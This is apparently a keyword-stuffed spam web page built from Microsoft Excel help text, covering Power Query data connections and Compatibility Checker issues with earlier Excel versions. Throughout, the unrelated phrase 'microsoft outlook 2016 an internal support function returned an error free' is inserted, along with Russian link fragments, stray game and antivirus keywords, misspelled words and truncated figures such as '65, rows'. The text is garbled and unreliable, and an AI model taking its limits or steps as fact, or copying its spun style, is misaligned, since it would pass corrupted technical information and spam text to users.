This command is similar to the Get Data command on the Data tab of the Excel ribbon. This command is similar to the Recent Sources command on the Data tab of the Excel ribbon. When you merge two external data sources, you join two queries that create a relationship between two tables. When you append two or more queries, the data is added to a query based on the names of the column headers in both tables.

The queries are appended in the order in which they’re selected. For more information, see Append queries Power Query. You can use the Power Query add-in to connect to external data sources and perform advanced data analyses. The following sections provide steps for connecting to your data sources – web pages, text files, databases, online services, and Excel files, tables, and ranges. Click the Power Query check box, then OK. The Power Query ribbon should appear automatically, but if it doesn’t, close and restart Excel.

The following video shows the Query Editor window appearing after editing a query from an Excel workbook. The following video shows one way to display the Query Editor. These automatic actions are equivalent to manually promoting a row and manually changing each column type. For example:. The following video shows the Query Editor window in Excel appearing after editing a query from an Excel workbook. If prompted, in the From Table dialog box, you can click the Range Selection button to select a specific range to use as a data source.

If the range of data has column headers, you can check My table has headers. The range header cells are used to set the column names for the query. Note: If your data range has been defined as a named range, or is in an Excel table, then Power Query will automatically sense the entire range and load it into the Query Editor for you. Plain data will automatically be converted to a table when it is loaded into the Query Editor. You can use the Query Editor to write formulas for Power Query.

You can also use the Query Editor to write formulas for Power Query. Note: While trying to import data from a legacy Excel file or an Access database in certain setups, you may encounter an error that the Microsoft Access Database Engine Microsoft. The error occurs on systems with only Office installed.

To resolve this error, download the following resources to ensure that you can proceed with the data sources you are trying to access. Microsoft Access Database Engine Redistributable. Access Database Engine Service Pack 1. In the Access Web dialog box, click a credentials option, and provide authentication values. Power Query will analyze the web page, and load the Navigator pane in Table View. If you know which table you want to connect to, then click it from the list.

For this example, we chose the Results table. Otherwise, you can switch to the Web View and pick the appropriate table manually. In this case, we’ve selected the Results table. Click Load , and Power Query will load the web data you selected into Excel. Windows : This is the default selection. In the next dialog box, select from Default or Custom , Windows , or Database connection options, enter your credentials, then press Connect. In the Navigator pane, select the tables or queries that you want to connect to, then press Load or Edit.

In the Browse dialog box, browse for or type a file URL to import or link to a file. Follow the steps in the Navigator dialog to connect to the table or query of your choice. After the connection succeeds, you will be able to use the Navigator pane to browse and preview the collections of items in the XML file in a tabular form.

Save Data Connection File and Finish. In the Select the database that contains the data you want pane, select a database, then click Next. To connect to a specific cube in the database, make sure that Connect to a specific cube or table is selected, and then select a cube from the list. In the Import Data dialog box, under Select how you want to view this data in your workbook , do one of the following:.

To store the selected connection in the workbook for later use, click Only Create Connection. This check box ensures that the connection is used by formulas that contain Cube functions that you create and that you don’t want to create a PivotTable report. To place the PivotTable report in an existing worksheet, select Existing worksheet , and then type the cell reference of the first cell in the range of cells where you want to locate the PivotTable report.

You can also click Collapse Dialog to temporarily hide the dialog box, select the beginning cell on the worksheet that you want to use, and then press Expand Dialog. To place the PivotTable report in a new worksheet starting at cell A1, click New worksheet.

To verify or change connection properties, click Properties , make the necessary changes in the Connection Properties dialog box, and then click OK.

You can either use Power Query or the Data Connection wizard. In the Access SharePoint dialog box that appears next, select a credentials option:. In the Navigator dialog, select the Database and tables or queries you want to connect to, then press Load or Edit.

In the Active Directory Domain dialog box for your domain, click Use my current credentials , or Use alternate credentials. For Use alternate credentials authentication, enter your Username and Password. After the connection succeeds, you can use the Navigator pane to browse all the domains available within your Active Directory, and drill down into Active Directory information including Users, Accounts, and Computers. See: Which version of Office am I using?

After you have installed a new version of Excel, you may want to know how you can continue to work with workbooks that are created in an earlier version of Excel, how you can keep these workbooks accessible for users who do not have the current version of Excel installed, and how the differences between the versions affect the way that you work. For backward compatibility with earlier versions of Excel, microsoft outlook 2016 an internal support function returned an error free as Excel продолжить чтение, you can use one of two ways to exchange workbooks between the different versions.

Work in Compatibility Mode You can open a workbook that was created in an earlier version of Excel and work in Compatibility Mode so that the workbook remains in a file format that can easily be opened again in the intenral version.

Compatibility mode is not available for Excel workbooks. Check a workbook for compatibility If you want to work in the current file format but have to share a workbook with people who use earlier versions of Excel, you can check that the data is compatible with earlier versions of Excel.

You can then make the necessary changes to avoid the loss of data or fidelity that might occur when that workbook is opened in an earlier version of Excel. In Excel and later, when you open a workbook that was created in Excelit is automatically opened in Compatibility Mode, and you see Compatibility Mode in square brackets next to the file name in the Excel title bar.

In Compatibility Mode, any new or enhanced Excel features ffunction not available, which prevents loss of data and fidelity when the workbook смотрите подробнее opened in an earlier version of Excel. Intenral, instead of using a current file format. Unlike other Office programs, such as Word, you cannot manually turn on Compatibility Mode in Excel, and you do not have the option to include any new features when you work in a workbook in Compatibility Mode.

If you no longer want to work in Compatibility Mode, you can convert the na to funcgion current file format. For reeturned, see Convert a workbook to a new file format. Not all new features are supported in earlier versions of Excel. When you work in Compatibility Mode or want to save aworkbook to the Excel To avoid the loss of data or functionality in an earlier version of Excel, you can then make the necessary changes to your current workbook.

When you save a workbook to an Excel file format, the Взято отсюда Checker runs automatically. However, to verify that a workbook is compatible with your current version of Excel, you must run the Compatibility Checker manually the first нажмите чтобы увидеть больше you save the workbook.

You can then specify that the Compatibility Checker runs automatically every time that you save that workbook. For information about how to run the Compatibility Checker, see Check an Excel workbook for compatibility with earlier versions of Excel.

The Compatibility Checker lists the compatibility issues it finds, and provides a Find and Help button for many issues. You can then locate all occurrences of the issue, and get information about ways to resolve the issue. When run automatically, the Compatibility Checker also specifies the version of Excel in which a potential compatibility issue occurs.

Unsupported worksheet features can cause адрес страницы following compatibility issues, leading to a significant loss of functionality or a minor loss of fidelity. This workbook has label information that will be lost or not visible if the file is saved as an earlier Читать больше format. What it means If you save this workbook in. If you save it in. What to do To preserve the labels, avoid saving the workbook in.

This workbook contains data in cells outside of the row and column limit of the selected file format. Data beyond 65, rows tall by IV columns wide will not be saved. Formula references to data in this region will return a REF! What it means Beginning with Excelthe worksheet size is 1, rows tall by16, columns wide, but Excel is only 65, rows tall by columns wide.

Data in cells outside of this column and row limit is lost in Excel 20166 What to do In the Compatibility Checker, click Find to locate the cells and ranges that fall outside ссылка на страницу row and column limits, select those rows and columns, and then place them inside the column and row limits of the worksheet fre on another worksheet по этому сообщению using the Cut and Xn commands.

This workbook contains Scenarios with references to outloo, outside of the row and column limits of the selected file returnedd. These Scenarios will not be saved in the selected file format. What it means A scenario in the worksheet refers to a cell outside the column and row limit of Excel 65, rows by columnsand is no longer available when you continue saving the workbook to microsoft outlook 2016 an internal support function returned an error free format of the earlier version of Excel.

What to do In the Scenario Manager, look for the scenario that contains returnex reference that falls outside the row and column limit of the earlier version of Excel, and then change the reference to a location within that limit.

In the Scenarios box, locate the scenario that causes the compatibility issue, and then edit its reference. This workbook contains dates in knternal calendar format that is not supported by the selected file format.

These dates will be displayed as Gregorian dates. However, these calendar formats are not supported in Excel What to do To avoid loss of functionality, you should change the calendar format to qn language or locale that is supported in Excel These dates must be edited by using functioj Gregorian outkook. In Excelthese calendar types can only be edited microsoft outlook 2016 an internal support function returned an error free Gregorian. This workbook contains more cells with data than are supported in earlier versions of Excel.

Earlier versions of Excel will not be able to open deturned workbook. What it means Beginning with Excelthe total number of available cell blocks CLBs is limited by available memory. A CLB includes 16 worksheet rows. If all rows in a worksheet contain data, you would have Errod in microsoft outlook 2016 an internal support function returned an error free worksheet, and you could have only aan such worksheets in a single instance of Excel regardless of how many workbooks you have reror in Excel.

What to do To make sure that the ouhlook does not exceed the 64, CLB limit and that it can be opened in Excelyou should work in Compatibility Mode after you save the workbook to Excel file format. What microsofy means In Excelsparklines that show trends in a series of values are not displayed on the worksheet.

However, all sparklines remain available in the workbook and are applied when the workbook is opened again in Excel or later. What to do In the Compatibility Checker, click Find to locate cells that contain sparklines, and then make the necessary changes. For example, you could apply conditional formatting instead of or in addition functiin the sparklines that won’t be displayed in the earlier version of Excel.

Earlier versions of Excel do not support color formatting in header and footer text. The color formatting information will be displayed as plain text in earlier versions of Excel. What it means Beginning with Excelyou can apply color formatting to header and footer text. Нажмите чтобы увидеть больше cannot use color formatting in headers and footers in Excel What to do In the Compatibility Checker, click Fix if you want to remove the color formatting.

This workbook contains worksheets that have even page or first page headers and footers. These page headers and footers cannot be displayed in earlier versions of Excel. What it means Microsoft outlook 2016 an internal support function returned an error free with Excelyou have the option to display different header and footer text on even pages or on the suplort page.

In Exceleven page or outlopk page headers and footers cannot be displayed, but they remain available for display when you open the workbook in Excel and later again.

What to do If you frequently save a workbook to Excel file format, it is best not to specify even or first page ab or footers for that workbook. Some cells or styles in this workbook contain formatting that is not supported by the selected file format.

These formats will be converted to the closest format available. What it means Beginning with Exceldifferent cell formatting or cell style options, such as special effects and shadows, are available. These options microsoft outlook 2016 an internal support function returned an error free not available in Excel What to do When you continue saving the workbook, Excel putlook the closest available format, which can be identical to another biohazard pc game you applied to something else.

To avoid duplication of formats, you can change or remove the cell formatting and cell styles that are not supported na you save the workbook to Excel file format. This workbook contains more unique cell formats than are supported by the selected file format. Some cell formats will not be saved. What it means Beginning with Excelyou can use 64, unique cell formats, but in Excelyou can only use up to 4, unique cell microsoft outlook 2016 an internal support function returned an error free.

Unique cell formats include micrrosoft specific combination of formatting that is applied in a workbook. What to do To avoid losing xupport cell formats that you want to keep available in Excelmicrosott can remove some cell intenral that are not as important to keep. This workbook contains more unique font formats than are supported in the selected file format.

Some font formats will not be saved. What it means Beginning with Excelvirusscan enterprise windows 10 download, global font types are available, and you can use up to of them per workbook.

Excel supports less unique font formats. What to do To avoid losing specific font нажмите чтобы увидеть больше that you want to keep available in Адрес страницыyou can remove some font formats that are not as important to funtion. For more information about how to resolve one or more of these compatibility issues, see the following articles:.

Move or copy cells and cell contents. Headers and footers microsoft outlook 2016 an internal support function returned an error free worksheets.

Unsupported Excel table features can cause the following compatibility issues, leading to a minor loss of fidelity. The table contains a custom formula or text in the total row.

In earlier versions of Excel, the data is displayed without a table. What rfturned means Although the formulas and text remain intact in Excelthe range will no longer be in table format.

What to do In the Compatibility Checker, click Find to locate the table that contains a custom outlok or text, remove that formula or text from the total row, and then use only formulas that are available in the total row.

A table in this workbook does not display a header row. What niternal means In Excela table cannot be displayed without вот ссылка header row. What to do In the Compatibility Checker, click Find to locate the table that is читать больше without a header row, and then display a header row.

A table style is fdee to a table in this workbook. Table style formatting micrlsoft be displayed in earlier versions of Excel. What it means In Exceltheme-based table styles are not available and outoook be displayed. What to do In the Microsoft outlook 2016 an internal support function returned an error free Checker, click Find to locate the table that has a table ссылка applied, remove that table style, and then format the table manually.

A table in this workbook is connected to an external data source. Table functionality will be lost, but the data remains connected. If table rows are hidden by a filter, they remain hidden in an earlier microsoft outlook 2016 an internal support function returned an error free of Excel.

What it means Table functionality is lost in Excel


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